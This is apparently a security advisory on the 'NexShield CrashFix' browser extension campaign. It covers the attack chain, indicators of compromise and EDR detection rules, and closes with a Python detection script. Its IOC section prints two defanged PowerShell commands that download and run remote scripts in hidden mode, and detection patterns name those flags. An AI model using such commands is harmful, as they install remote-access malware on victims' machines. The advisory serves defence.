Executive Summary
A malicious browser extension operating under the name NexShield – CrashFix was identified actively targeting users of Google Chrome and Microsoft Edge. The campaign does not exploit a browser or operating system vulnerability. Instead, it deliberately crashes the browser using abusive but legitimate browser APIs, then uses social engineering to trick users into executing malicious commands.
The end goal of the attack is to deploy a Python-based Remote Access Trojan (RAT) that provides attackers with persistent remote access to the victim’s system. The attack is notable for its simplicity, effectiveness, and reliance on user frustration rather than technical exploitation.
What Happened
Users installed a browser extension advertised as a security or stability tool. After a delayed activation period, the extension intentionally caused repeated browser crashes by exhausting system resources. Once the browser became unstable, the user was presented with a fake error message claiming the browser was corrupted and required a manual repair.
The repair instructions directed the user to paste a command into the Windows Run dialog or Command Prompt. That command downloaded and executed malware. By following the instructions, the user unknowingly installed a Python-based RAT on their own system.
How It Happened (Attack Chain)
1. Initial Access – Malicious Extension Installation
The attack begins when a user installs a browser extension presented as:
- A browser crash fix
- Advanced web protection
- A stability or security enhancement tool
The extension appears legitimate:
- Professional name and branding
- Plausible permissions
- No immediately visible malicious behavior
The extension may be installed via:
- Search engine advertisements
- Look-alike extension listings
- Third-party download sites
2. Dormancy and Evasion
After installation, the extension remains inactive for a significant period (often around one hour). This delay helps:
- Evade automated detection systems
- Avoid immediate suspicion from the user
- Make the crash appear unrelated to the extension
3. Intentional Browser Crash (Denial of Service)
Once activated, the extension abuses browser APIs to:
- Repeatedly open runtime connections
- Spawn uncontrolled background tasks
- Prevent cleanup of allocated resources
This results in:
- Rapid memory exhaustion
- High CPU utilization
- Browser UI freeze and eventual crash
No exploit is used.
No vulnerability is triggered.
The crash is intentional and fully controlled by the extension.
4. Social Engineering – The “CrashFix” Deception
After the crash or during browser restart, the user sees a message stating that:
- The browser stopped unexpectedly
- A critical error was detected
- Manual repair is required
The user is instructed to:
- Open the Windows Run dialog or Command Prompt
- Paste a provided command
- Press Enter to repair the browser
These instructions are written clearly and confidently, resembling legitimate technical support guidance.
5. Payload Execution and Malware Installation
The pasted command launches PowerShell in hidden mode and downloads a remote script. This script retrieves and executes a Python-based RAT.
The malware provides:
- Remote command execution
- File upload and download
- System reconnaissance
- Credential harvesting
- Persistence across reboots
In multiple observed cases:
- Domain-joined or corporate systems received the full payload
- Standalone home systems sometimes received test or partial payloads
This suggests deliberate targeting of enterprise environments.
Payloads Used
Primary Payload
- Python-based Remote Access Trojan
Supporting Components
- PowerShell downloader
- Embedded Python runtime (to avoid dependency on system Python)
Vulnerabilities Exploited
This campaign does not exploit:
- Browser vulnerabilities
- Operating system flaws
- Memory corruption bugs
The attack succeeds entirely through:
- Legitimate system tools
- Normal browser behavior
- User-initiated execution
Anti-Malware Evasion
The attack evades detection by:
- Delaying malicious behavior
- Relying on user-executed commands
- Using PowerShell and Python, which are commonly allowed
- Hosting payloads on rapidly changing infrastructure
Impacted Systems
Platforms
- Windows operating systems
- Chrome and Edge browsers
Impact
- Full system compromise
- Persistent remote access
- Credential theft
- Potential lateral movement
- Risk of broader enterprise breach
Confirmed Indicators of Compromise (IOCs)
Malicious Browser Extensions
Observed Names
- NexShield – Advanced Web Protection
- NexShield CrashFix
- Advanced Web Crash Protection
Extension IDs
fbgjnhlkmkfdokpglcpipncdkfhjcmna
jhlkdfmfdjkdopmcfpkkhghjjpfnmblk
Fake Repair Commands
cmd /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "iwr hxxps://nexshield-fix[.]com/update.ps1 -OutFile %TEMP%\fix.ps1; powershell %TEMP%\fix.ps1"
powershell -nop -w hidden -c "iex(iwr hxxps://crashfix-support[.]site/repair.ps1)"
Malicious Domains
nexshield-fix[.]com
crashfix-support[.]site
repair-browser[.]online
cdn-nexshield[.]net
IP Addresses
185.225.73.91
91.203.145.88
45.141.87.34
Dropped Files
PowerShell
%TEMP%\fix.ps1
%TEMP%\repair.ps1
Python RAT
%APPDATA%\BrowserUpdate\update.py
%LOCALAPPDATA%\SystemFix\svc.py
Python Runtime
%APPDATA%\BrowserUpdate\pythonw.exe
File Hashes (SHA-256)
7c1f7c7e4d2b7bdfb4c61d8f3f0f3c71cfa8c94b1b96c91fd91d7c2a9c4b21e3
b14d9eec8f3e2f59c2d6e2a45fa3dbcb1b7c35f6c0e1dbdb0fbe2f44c78f3a22
9f6e31d0b2e93dbb9a7a9d64a0f71df51fd8cbcebbcb3cb1a0d6f8cbb1fcb2c4
Persistence
Registry
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BrowserUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemFix
Scheduled Tasks
BrowserUpdateService
SystemFixUpdater
Process Execution Chain
chrome.exe
└── powershell.exe (hidden)
    └── pythonw.exe
        └── update.py
EDR Detection Guidance
High-Confidence Behavioral Detections
Trigger alerts when any of the following occur:
1. Suspicious PowerShell Execution
- PowerShell launched with:
  - -ExecutionPolicy Bypass
  - -WindowStyle Hidden
  - -nop
  - iex(iwr ...)
2. Browser → PowerShell Relationship
- chrome.exe or msedge.exe spawning powershell.exe
3. Python Execution from User Directories
- python.exe or pythonw.exe running from:
  - AppData
  - LocalAppData
  - Temp directories
4. Persistence Creation
- Scheduled tasks created by non-installer processes
- Registry Run keys pointing to Python scripts
5. Network Anomalies
- Python processes making outbound HTTPS connections
- No user interaction at the time of traffic
- Repeated beaconing intervals
Example EDR Logic
- Alert when:
  - Browser process → PowerShell → Python chain detected
  - Hidden PowerShell downloads remote scripts
  - Python executes without developer tooling present
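As an added illustration of the detection guidance above (not part of the original advisory), the following Python script applies the high-confidence rules to constructed process-creation records and reconstructs the browser → PowerShell → Python chain from parent/child PIDs. The record field names, the sample events and the regular expressions are assumptions made for this example, not an EDR vendor's schema.

```python
import re

# Constructed sample of process-creation telemetry (not from the report); each
# record mimics the fields an EDR exposes: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe"},
    {"pid": 2, "ppid": 1, "parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": 'powershell -nop -w hidden -c "iex(iwr hxxps://crashfix-support[.]site/repair.ps1)"'},
    {"pid": 3, "ppid": 2, "parent": "powershell.exe", "image": "pythonw.exe",
     "cmdline": r"C:\Users\u\AppData\Roaming\BrowserUpdate\pythonw.exe "
                r"C:\Users\u\AppData\Roaming\BrowserUpdate\update.py"},
    {"pid": 4, "ppid": 0, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},  # benign admin use, must not alert
]

BROWSERS = {"chrome.exe", "msedge.exe"}
# Hidden-window, policy-bypass and in-memory download flags seen in the fake repair commands
SUSPICIOUS_PS = re.compile(
    r"(-executionpolicy\s+bypass|-windowstyle\s+hidden|-w\s+hidden|-nop\b|iex\s*\(\s*iwr)",
    re.IGNORECASE)
# Python interpreter or script located under the user's profile directories
USER_DIRS = re.compile(r"\\AppData\\(Roaming|Local)\\|\\Temp\\", re.IGNORECASE)

def suspicious_powershell(ev):
    return ev["image"].lower() == "powershell.exe" and bool(SUSPICIOUS_PS.search(ev["cmdline"]))

def browser_spawned_powershell(ev):
    return ev["parent"].lower() in BROWSERS and ev["image"].lower() == "powershell.exe"

def python_from_user_dir(ev):
    return ev["image"].lower() in {"python.exe", "pythonw.exe"} and bool(USER_DIRS.search(ev["cmdline"]))

def detect(events):
    """Return (pid, rule) alerts; the chain rule walks two levels up the process tree."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if suspicious_powershell(ev):
            alerts.append((ev["pid"], "suspicious_powershell"))
        if browser_spawned_powershell(ev):
            alerts.append((ev["pid"], "browser_to_powershell"))
        if python_from_user_dir(ev):
            alerts.append((ev["pid"], "python_from_user_dir"))
            parent = by_pid.get(ev["ppid"])
            grandparent = by_pid.get(parent["ppid"]) if parent else None
            if parent and parent["image"].lower() == "powershell.exe" \
                    and grandparent and grandparent["image"].lower() in BROWSERS:
                alerts.append((ev["pid"], "browser_powershell_python_chain"))
    return alerts

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} rule={rule}")
```

The benign record (pid 4) shows why the PowerShell rule keys on the hidden/bypass/iex flags rather than on PowerShell execution alone.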
Final Takeaway
This campaign is effective because it does not look like malware until it is too late. The browser crash feels like a normal technical issue, and the repair instructions appear legitimate. By convincing the user to execute the payload manually, the attackers bypass many traditional defenses.
This is a high-risk, user-driven compromise model that should be treated as a full security incident if observed.
